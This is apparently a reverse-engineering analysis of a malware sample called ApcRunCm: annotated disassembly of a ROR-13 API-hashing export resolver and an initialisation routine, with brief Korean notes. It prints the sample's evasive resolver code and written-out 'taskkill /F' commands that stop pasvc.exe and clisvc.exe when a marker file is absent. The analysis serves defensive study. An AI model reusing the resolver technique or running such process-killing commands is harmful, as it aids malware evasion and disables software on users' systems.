; ---------------------------------------------------------------------------
; sub_004023FA - resolve an export of a loaded module by a 32-bit name hash
; (ROR-13 / add), following export forwarders when told how to.
;
; Stack arguments (offsets given relative to ESP after the 6 pushes below):
;   arg1 [ESP+0x1C]  target hash of the export name
;   arg2 [ESP+0x20]  base of the module to search (read into EBP at 004023FE;
;                    kernel32 7C7D0000 in this dump)
;   arg3 [ESP+0x24]  called as arg3(dllName) when the export is a forwarder
;   arg4 [ESP+0x28]  called as arg4(module, funcName) for the forwarded name
; Returns EAX = VA of the export, or 0 when the module has no export names,
; no name hashes to arg1, or a forwarder is met while arg3/arg4 is zero.
;
; Review notes (details inline): the forwarder path copies the DLL name into a
; 16-byte stack buffer with no length check, the arg3/arg4 presence tests look
; only at the low byte of each pointer, and the module handle returned by arg3
; is passed on without a NULL check.
; ---------------------------------------------------------------------------
004023FA . 53                PUSH EBX                                  ; kernel32.7C7D353C (register contents at dump time)
004023FB . 55                PUSH EBP                                  ; kernel32.7C7D0000
004023FC . 56                PUSH ESI                                  ; kernel32.7C7D7376
004023FD . 57                PUSH EDI
004023FE . 8B6C24 18         MOV EBP, DWORD PTR SS:[ESP+0X18]          ; ApcRunCm.0040116C -- EBP = arg2, base of the module to search
00402402 . 8B45 3C           MOV EAX, DWORD PTR SS:[EBP+0X3C]          ; EAX = e_lfanew (offset of the PE header)
00402405 . FF7405 78         PUSH DWORD PTR SS:[EBP+EAX+0X78]          ; push export directory RVA  -> read back as [ESP+4]
00402409 . FF7405 7C         PUSH DWORD PTR SS:[EBP+EAX+0X7C]          ; push export directory size -> read back as [ESP]
0040240D . 8B5405 78         MOV EDX, DWORD PTR SS:[EBP+EAX+0X78]
00402411 . 03D5              ADD EDX, EBP                              ; EDX = IMAGE_EXPORT_DIRECTORY (VA)
00402413 . 8B4A 18           MOV ECX, DWORD PTR DS:[EDX+0X18]          ; ECX = NumberOfNames
00402416 . 8B5A 20           MOV EBX, DWORD PTR DS:[EDX+0X20]          ; EBX = AddressOfNames
00402419 . 03DD              ADD EBX, EBP                              ; (RVA -> VA)
0040241B . E3 70             JECXZ 0X0040248D                          ; names exhausted (or none at all): return 0
0040241D . 49                DEC ECX                                   ; walk the name table from the last entry downwards
0040241E . 8B348B            MOV ESI, DWORD PTR DS:[EBX+ECX*4]
00402421 . 03F5              ADD ESI, EBP                              ; ESI = current export name (VA)
00402423 . 33FF              XOR EDI, EDI                              ; EDI = running hash
00402425 . FC                CLD
00402426 > 33C0              XOR EAX, EAX                              ; AH = 0 doubles as the NUL terminator compared below
00402428 . AC                LODSB
00402429 . 3AC4              CMP AL, AH
0040242B . 74 07             JE 0X00402434                             ; end of name
0040242D . C1CF 0D           ROR EDI, 0X0D                             ; hash = ror(hash,13) + byte - the ROR-13 API-hash scheme familiar from shellcode.
                                                                       ; The author's original note ("encrypts the function list and restores the
                                                                       ; original text") is misleading: nothing is decrypted, each export name is
                                                                       ; hashed and the hash compared against arg1.
00402430   03F8              ADD EDI, EAX
00402432 ^ EB F2             JMP 0X00402426
00402434   3B7C24 1C         CMP EDI, DWORD PTR SS:[ESP+0X1C]          ; hash == arg1 ?
00402438 ^ 75 E1             JNE 0X0040241B                            ; no -> next name
0040243A   8B5A 24           MOV EBX, DWORD PTR DS:[EDX+0X24]          ; AddressOfNameOrdinals.  Author's note: a breakpoint here lets you
                                                                       ; harvest every API the sample resolves (hash -> name, ESI = name).
0040243D   03DD              ADD EBX, EBP
0040243F   66:8B0C4B         MOV CX, WORD PTR DS:[EBX+ECX*2]           ; CX = ordinal of the matched name
00402443   8B5A 1C           MOV EBX, DWORD PTR DS:[EDX+0X1C]          ; AddressOfFunctions
00402446   03DD              ADD EBX, EBP
00402448   8B048B            MOV EAX, DWORD PTR DS:[EBX+ECX*4]         ; EAX = function RVA
0040244B   8BD8              MOV EBX, EAX                              ; keep the RVA for the forwarder range test
0040244D   03C5              ADD EAX, EBP                              ; EAX = function VA (the normal return value)
0040244F   3B5C24 04         CMP EBX, DWORD PTR SS:[ESP+0X04]          ; RVA below the export directory?
00402453   7C 3C             JL 0X00402491                             ; yes -> real code, return EAX
00402455   2B5C24 04         SUB EBX, DWORD PTR SS:[ESP+0X04]
00402459 . 3B1C24            CMP EBX, DWORD PTR SS:[ESP]               ; beyond the end of the export directory?
0040245C . 7F 33             JNLE 0X00402491                           ; yes -> real code, return EAX
                                                                       ; otherwise EAX points INTO the export directory: a forwarder string "DLL.Func"
0040245E . 807C24 24 00      CMP BYTE PTR SS:[ESP+0X24], 0X00000000    ; arg3 present?  NOTE: only the low byte of the pointer is tested, so a
00402463 . 74 28             JE 0X0040248D                             ;   non-null arg3/arg4 whose address ends in 0x00 is treated as absent.
00402465 . 807C24 28 00      CMP BYTE PTR SS:[ESP+0X28], 0X00000000    ; arg4 present?  (same low-byte test)
0040246A . 74 21             JE 0X0040248D
0040246C . 83EC 10           SUB ESP, 0X10                             ; 16-byte stack buffer for the forwarder's DLL name
                                                                       ; (author's note: "another DLL is called")
0040246F . 8BF0              MOV ESI, EAX                              ; ESI = forwarder string
00402471 . 8BFC              MOV EDI, ESP                              ; EDI = buffer
00402473 > AC                LODSB
00402474 . AA                STOSB                                     ; copy up to and including '.' - no length check: a DLL name of 16 or more
00402475 . 3C 2E             CMP AL, 0X2E                              ;   characters, or a string with no '.', overruns the buffer (and the stack).
00402477 .^ 75 FA            JNE 0X00402473
00402479 . C647 FF 00        MOV BYTE PTR DS:[EDI-0X01], 0X00000000    ; overwrite '.' with NUL -> buffer = "DLL"; ESI now points at "Func"
0040247D . 54                PUSH ESP
0040247E . FF5424 38         CALL DWORD PTR SS:[ESP+0X38]              ; arg3(dllName).  The debugger label "kernel32.GetProcAddress" is the slot's
                                                                       ; contents at dump time; this call passes a single argument (the DLL name),
                                                                       ; so a LoadLibrary-style loader is what one would expect - confirm with a breakpoint.
00402482 . 56                PUSH ESI                                  ; function name
00402483 . 50                PUSH EAX                                  ; module handle returned by arg3 - NOT checked for NULL before use
00402484 . FF5424 40         CALL DWORD PTR SS:[ESP+0X40]              ; arg4(module, funcName); EAX = final address
00402488 . 83C4 10           ADD ESP, 0X10                             ; drop the name buffer only - stack balance implies both callees removed their own arguments
0040248B . EB 04             JMP 0X00402491
0040248D . 33C0              XOR EAX, EAX                              ; failure: return 0
0040248F . EB 00             JMP 0X00402491                            ; jump to the next instruction (effectively a no-op)
00402491 > 83C4 08           ADD ESP, 0X08                             ; drop the export RVA/size pair pushed at 00402405/00402409
00402494 . 5F                POP EDI
00402495 . 5E                POP ESI                                   ; kernel32.7C7D7376
00402496 . 5D                POP EBP                                   ; kernel32.7C7D0000
00402497 . 5B                POP EBX                                   ; kernel32.7C7D353C
00402498 . C3                RET
IAT 기록 (004027C1)
호출 순서
OpenFileMappingA -> CreateFileMappingA -> GetWindowsDirectoryA -> strcat -> PathFileExistsA -> InitializeCriticalSection
; ---------------------------------------------------------------------------
; Excerpt from the initialisation routine (its prologue and the code after
; 0040122E lie outside this listing).  ESI addresses a per-sample data block
; (debugger shows ApcRunCm.00402499); the [ESI+0x3xx] slots read here are the
; resolved API pointers.  EBX is pushed where 0/NULL is expected and so is
; presumably 0 at this point - confirm.
; ---------------------------------------------------------------------------
004011E5 . 57                PUSH EDI                                  ; ApcRunCm.00402991 -> lpName (section name)
004011E6 . 6A 10             PUSH 0X00000010                           ; dwMaximumSizeLow = 16
004011E8 . 53                PUSH EBX                                  ; dwMaximumSizeHigh
004011E9 . 6A 04             PUSH 0X00000004                           ; flProtect = PAGE_READWRITE
004011EB . 53                PUSH EBX                                  ; lpAttributes
004011EC . 6A FF             PUSH 0XFFFFFFFF                           ; hFile = INVALID_HANDLE_VALUE (pagefile-backed section)
004011EE . FF96 38030000     CALL DWORD PTR DS:[ESI+0X00000338]        ; kernel32.CreateFileMappingA - a 16-byte named section.  Together with the
                                                                       ; OpenFileMappingA listed before it this looks like a single-instance marker;
                                                                       ; the return value is not checked within this excerpt.
004011F4 . 68 03010000       PUSH 0X00000103                           ; uSize = 0x103
004011F9 . 8D85 F4FEFFFF     LEA EAX, DWORD PTR SS:[EBP-0X0000010C]    ; EAX = path buffer on the stack
004011FF . 50                PUSH EAX
00401200 . FF96 3C030000     CALL DWORD PTR DS:[ESI+0X0000033C]        ; kernel32.GetWindowsDirectoryA(buf, 0x103)
00401206 . 8D86 2E050000     LEA EAX, DWORD PTR DS:[ESI+0X0000052E]    ; suffix string in the data block (presumably "\Temp\~v3.log" given the author's note below)
0040120C . 50                PUSH EAX
0040120D . 8D85 F4FEFFFF     LEA EAX, DWORD PTR SS:[EBP-0X0000010C]
00401213 . 50                PUSH EAX
00401214 . FF96 A8030000     CALL DWORD PTR DS:[ESI+0X000003A8]        ; msvcrt.strcat(buf, suffix) - unbounded append into a fixed stack buffer; the
                                                                       ; buffer can be at most 0x104 bytes without overlapping the locals at
                                                                       ; EBP-0x08/EBP-0x04 written just after this excerpt.  Fine for a short
                                                                       ; hard-coded suffix; worth noting should the suffix ever be externally controlled.
0040121A . 59                POP ECX                                   ; ApcRunCm.00402499 -- cdecl cleanup of the two strcat arguments
0040121B . 59                POP ECX                                   ; ApcRunCm.00402499
0040121C . 8D85 F4FEFFFF     LEA EAX, DWORD PTR SS:[EBP-0X0000010C]
00401222 . 50                PUSH EAX
00401223 . FF96 CC030000     CALL DWORD PTR DS:[ESI+0X000003CC]        ; shlwapi.PathFileExistsA(buf) - does C:\Windows\Temp\~v3.log exist?
00401229 . 85C0              TEST EAX, EAX
0040122B . 75 6C             JNE 0X00401299                            ; file present -> skip the process kill (behaves like an "already done" marker / kill-switch)
0040122D . 56                PUSH ESI                                  ; ApcRunCm.00402499 - data block pointer passed as the argument
0040122E . FF96 B0020000     CALL DWORD PTR DS:[ESI+0X000002B0]        ; ApcRunCm.004021B2 - per the author, terminates processes via taskkill
C:\Windows\Temp\~v3.log 파일의 유무를 확인하여, 파일이 없을 경우 아래 명령을 실행한다:
taskkill /F /IM pasvc.exe 실행 / taskkill /F /IM clisvc.exe 실행
; ---------------------------------------------------------------------------
; Continuation of the previous excerpt (repeats the call at 0040122E).  The
; enclosing routine continues beyond this listing; the author notes it then
; starts worker threads.
; ---------------------------------------------------------------------------
0040122E . FF96 B0020000     CALL DWORD PTR DS:[ESI+0X000002B0]        ; ApcRunCm.004021B2 - taskkill helper (author: kills pasvc.exe / clisvc.exe)
00401234 . 8D46 10           LEA EAX, DWORD PTR DS:[ESI+0X10]          ; EAX = first CRITICAL_SECTION, embedded in the data block at ESI+0x10
00401237 . 59                POP ECX                                   ; 0012FDC0 -- removes the PUSH ESI made before the call (caller cleans up)
00401238 . 50                PUSH EAX
00401239 . 8945 FC           MOV DWORD PTR SS:[EBP-0X04], EAX          ; keep the pointer in a local
0040123C . FF96 40030000     CALL DWORD PTR DS:[ESI+0X00000340]        ; kernel32.InitializeCriticalSection(ESI+0x10)
00401242 . 8D46 28           LEA EAX, DWORD PTR DS:[ESI+0X28]          ; second CRITICAL_SECTION at ESI+0x28 - 0x18 bytes after the first,
                                                                       ; consistent with the 24-byte 32-bit CRITICAL_SECTION layout
00401245 . 50                PUSH EAX
00401246 . 8945 F8           MOV DWORD PTR SS:[EBP-0X08], EAX          ; keep the pointer in a local
00401249 . FF96 40030000     CALL DWORD PTR DS:[ESI+0X00000340]        ; kernel32.InitializeCriticalSection(ESI+0x28)
0040124F . 56                PUSH ESI                                  ; ApcRunCm.00402499 - data block pointer as the argument
00401250 . 895D 08           MOV DWORD PTR SS:[EBP+0X08], EBX          ; overwrites the routine's first stack argument with EBX (presumably 0,
                                                                       ; if EBP is a standard frame pointer) - confirm
00401253 . FF96 5C020000     CALL DWORD PTR DS:[ESI+0X0000025C]        ; ApcRunCm.0040129E - per the author, a GetVersion check
이후 Thread를 실행한다.